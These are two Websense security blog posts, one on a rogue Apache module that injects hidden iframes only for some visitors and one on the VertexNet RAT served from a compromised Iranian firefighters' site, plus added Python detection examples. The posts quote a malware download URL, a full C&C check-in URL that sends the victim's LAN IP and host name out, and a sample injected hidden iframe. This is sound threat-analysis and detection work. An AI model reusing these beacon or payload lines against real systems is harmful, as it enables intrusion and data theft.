One of the conditions the rogue Apache module enforces is that injected code appears on a website only when a visitor from a unique IP address accesses the site for the first time, or arrives via specific referrers. Because the module makes injected content appear or disappear dynamically based on parameters like these, detection is much more challenging for security solutions that don't employ real-time content analysis. Websense real-time analysis parses and analyzes websites on the fly and checks for malicious content. When injected code is found, the website is blocked and customers are protected.

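To show what a content-level check has to contend with here, the following is an added example (not Websense code and not part of the original post): given copies of the same page as served under different visitor conditions, it diffs the iframes they contain and also flags iframes sized or styled to be invisible. The page copies, the condition labels and the example.invalid URL are all constructed.

```python
"""Spot iframes a site serves only to some visitors (added example, not Websense code).

The rogue Apache module above injects only for a first-time visitor from a unique
IP or for specific referrers, so one fetch never tells the whole story: fetch the
same page under several conditions and diff the iframes each copy contains.
"""
from html.parser import HTMLParser

class IframeCollector(HTMLParser):
    """Collect (src, hidden) for every <iframe> in a document."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                  or "display:none" in style or "visibility:hidden" in style)
        self.iframes.append((a.get("src", ""), hidden))

def extract_iframes(html):
    parser = IframeCollector()
    parser.feed(html)
    return parser.iframes

def hidden_iframes(html):
    """Iframe srcs sized or styled to be invisible, a classic injection tell."""
    return [src for src, hidden in extract_iframes(html) if hidden]

def conditional_iframes(responses):
    """responses: {condition_label: html of the same URL}. Return iframe srcs
    present in some copies but not all, i.e. content that depends on who asks."""
    per_cond = [{src for src, _ in extract_iframes(h)} for h in responses.values()]
    if not per_cond:
        return []
    return sorted(set().union(*per_cond) - set.intersection(*per_cond))

# Constructed sample: one page fetched three ways. example.invalid stands in for
# the injected URL, which the real module also rotates over time.
CLEAN = ("<html><body><h1>Site</h1>"
         "<iframe src='https://www.youtube.com/embed/x'></iframe></body></html>")
INJECTED = CLEAN.replace("</body>", "<iframe src='http://example.invalid/in.php' "
                         "width='0' height='0' style='display: none'></iframe></body>")
SAMPLE = {"fresh-ip-first-visit": INJECTED, "same-ip-repeat-visit": CLEAN,
          "admin-ip-logged-in": CLEAN}
```

In practice the copies would come from crawlers on different IPs and with different Referer headers; a src that shows up in only some of them is worth pulling the server's loaded Apache modules for.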
Image 4: Website blocked by Websense real-time analytics:

Artem Gololobov

Iranian Firefighters' Website Compromised to Serve VertexNet RAT
Posted: 01 Nov 2012 03:00 AM

Thanks to the Websense® ThreatSeeker® Network, we have detected that an Iranian website has been compromised to serve a Remote Administration Tool (RAT) called VertexNet. This website does not have a high Alexa rank, but it is one of a few cases that have caught our attention. The targeted website (hxxp://www.sarifire.ir) seems to be a portal documenting the activities of firefighters in the city of Sari, located in northern Iran. Given Iran's high profile in recent news stories, we decided to analyze this case. At the time of writing, the website still appears to be injected, as shown below:

In the following snippet of code, we see yet another Java-driven attempt to install the specified ".exe" file referenced by the URL hxxp://thesilentecho.com/tmp/kav.exe:

Although at this time the JAR file is not available, a quick Google search using the name of the Java class ("alakazam.class") in the code snippet above reveals the following Pastebin submission (http://pastebin.com/DbT64XfG). This code seems directly related to the Java JAR file used in this attack:

In the red box, we see the same parameter name that is used in the applet section of the injected website. Also, from what we see, the website appears to be compromised on the server side, because every requested web page contains the same injected code. As reported in a previous blog post, the injected code does not exploit any Java vulnerabilities. Instead, it tries to load the binary file "kav.exe" using the "url" parameter. We decided to focus on looking for interesting patterns, and based on the kind of malware used and the website's audience, our investigation led us to suspect a targeted attack. Although this is a government-affiliated portal, the targeted users could be civilians as well as users inside the government's LAN. We submitted the binary file for Websense ThreatScope™ analysis, with the following result:

The full report is found here: http://aceinsight.websense.com/fileanalysisreport.aspx?rid=8C0C7F7F736D4AFDB075F766AE466C87. From the network traffic exchanged between an infected system and the C&C, it is possible to retrieve the clear-text syntax of the commands sent in the first dialogue. For example, the following command:

hxxp://www.chat-mr.com/images/.vr/adduser.php?uid={a81f29c0-dc94-11e0-b358-806d6172696f--337009188}&lan=10.74.33.100&cmpname=ADMIN-0B1297EC9%20[Administrator]&country=English%20(United%20States)%20+1&cc=US&idle=283&ver=v1.2

is quite self-explanatory, revealing the UID, the LAN IP address, the computer name (cmpname parameter), and other geographical data. The parameter "ver" is the release version of this RAT. This kind of HTTP request is commonly seen in botnets, which implement their C&C communication on top of the HTTP protocol. At the time of this analysis, the domain "www.chat-mr.com" looks like it has expired, but the whois information seems to have been continuously updated. Here is the graph view from Robtex:

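As an added example, not Websense's code or tooling, the following parser pulls the fields out of an adduser.php check-in with the shape quoted above and scans proxy log records (timestamp, client IP, URL) for it. The log lines are constructed; the C&C URL in the first record is the one quoted in this post, the other two records are made up.

```python
"""Flag VertexNet-style C&C check-ins in web proxy logs (added example, not
Websense's code or tooling).

The adduser.php request quoted above carries uid, lan, cmpname, country, cc,
idle and ver parameters. parse_checkin() extracts them from any URL of that
shape; scan_proxy_log() applies it to 'timestamp client_ip url' records.
"""
import re
from urllib.parse import parse_qs, urlsplit

REQUIRED = {"uid", "lan", "cmpname", "ver"}
# The quoted uid looks like {GUID--digits}; a mismatch is reported, not dropped.
UID_RE = re.compile(r"^\{[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}--\d+\}$")

def parse_checkin(url):
    """Return the beacon fields, or None if the URL does not have that shape."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/adduser.php"):
        return None
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if not REQUIRED.issubset(q):
        return None
    return {
        "c2_host": parts.hostname,
        "uid": q["uid"],
        "uid_format_ok": bool(UID_RE.match(q["uid"])),
        "lan_ip": q["lan"],
        "host_name": q["cmpname"],   # %20 decoded, e.g. 'ADMIN-... [Administrator]'
        "country": q.get("country"),
        "cc": q.get("cc"),
        "idle": int(q["idle"]) if q.get("idle", "").isdigit() else None,
        "version": q["ver"],
    }

def scan_proxy_log(lines):
    """Return [(client_ip, fields)] for every record whose URL parses as a check-in."""
    hits = []
    for line in lines:
        cols = line.split()
        if len(cols) >= 3 and (beacon := parse_checkin(cols[2])):
            hits.append((cols[1], beacon))
    return hits

# Constructed proxy log: one infected host beaconing, two benign requests.
SAMPLE_LOG = """\
1351764000.123 10.74.33.100 http://www.chat-mr.com/images/.vr/adduser.php?uid={a81f29c0-dc94-11e0-b358-806d6172696f--337009188}&lan=10.74.33.100&cmpname=ADMIN-0B1297EC9%20[Administrator]&country=English%20(United%20States)%20+1&cc=US&idle=283&ver=v1.2
1351764001.456 10.74.33.101 http://www.example.com/images/adduser.php?name=bob
1351764002.789 10.74.33.102 http://www.example.com/index.html
""".splitlines()
```

The cmpname field gives the infected machine's host name, which is the fastest way to pair a proxy hit with an endpoint for containment.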
We started a static analysis of the binary file "kav.exe" (MD5: F6B258F2C3F10A5D35C8FF852FB6A004). The file is not packed, permitting easy access to clear-text strings. One of the most interesting is this one:

The string above refers to a debug file used during the build of the binary "kav.exe", in which we clearly see the name of the RAT: VertexNet. An Internet search led us to one of the forums where this RAT has been reported:

From other strings, we can determine the features implemented in this RAT, as follows:

As also confirmed by an analysis released by an individual researcher, VertexNet has the usual features of other tools of this kind, such as: downloading files from a URL, running new processes, updating the C&C, forcing the user to visit a URL, and so on. We think that one of the most used features may be the activation of a keylogger, highlighted in the screenshot above.

Given the potential audience for this website, we tried to figure out the reasons for this attack. We could be led to think that this is a reconnaissance attack aimed at breaching the systems of some affiliated government internet user. Given the tools used (the VertexNet RAT is free, as is its control panel), we could conclude that this is probably an isolated injection meant to impact some systems, made possible by some misconfiguration inside the hosting provider of this website.

Websense customers are protected from this and other threats by Websense ACE (Advanced Classification Engine).

Gianluca Giuliani

©2013 Websense, Inc. All Rights Reserved.